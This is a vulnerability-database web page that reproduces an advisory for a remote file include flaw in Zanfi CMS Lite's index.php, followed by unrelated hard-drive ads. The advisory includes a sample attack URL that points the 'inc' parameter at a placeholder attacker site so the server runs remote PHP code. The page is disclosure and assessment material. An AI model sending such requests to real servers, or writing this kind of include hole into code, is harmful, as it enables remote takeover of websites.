Vulnerability Assessment & Network Security Forums



If through a vulnerability assessment, a network security issue is detected for the vulnerability below, applying the appropriate security patches in a timely matter is very important.  If you have detected that your system has already been compromised, following CERT's Network Security recovery document will assist with recommended steps for system recovery.


Home >> Browse Vulnerability Assessment Database >> CGI abuses >> Zanfi CMS Lite Remote File Include


Vulnerability Assessment Details

Zanfi CMS Lite Remote File Include

Vulnerability Assessment Summary
Acertains if Zanfi CMS can include third-party files

Detailed Explanation for this Vulnerability Assessment

Summary :

The remote web server contains a PHP script that is prone to arbitrary
PHP code execution and file disclosure attacks.

Description :

The remote host is running Zanfi CMS Lite, a content management system
written in PHP.

There is a bug in the remote version of this software that may permit
a possible hacker to execute arbitrary commands on the remote host by using
a file inclusion bug in the file 'index.php'.

A possible hacker may execute arbitrary commands by requesting :

http://www.example.com/index.php?inc=http://[evilsite]/commands

This will make the remote script include the file 'commands.php' and
execute it.

See also :

http://www.securityfocus.com/archive/1/378053

Solution :

Unknown at this time.

Network Security Threat Level:

Medium / CVSS Base Score : 6
(AV:R/AC:H/Au:NR/C:P/A:P/I:P/B:N)

Networks Security ID: 11362

Vulnerability Assessment Copyright: This script is Copyright (C) 2004-2006 Tenable Network Security

Cables, Connectors

OWC 500 GB Mercury Electra 6G SSD 2.5" Serial-ATA 7mm Solid State Drive,
$88.36
OWC 500 GB Mercury Electra 6G SSD 2.5Toshiba 500GB 2.5" SATA Notebook Hard Disk Drive MQ01ABF050 LT05
$29.95
Toshiba 500GB 2.5Asus Vivobook Pro 15.6" N580V OEM HDD Hard Drive Caddy 13NB0GW0M08X21 GLP*
$19.99
Asus Vivobook Pro 15.6


Discussions

No Discussions have been posted on this vulnerability.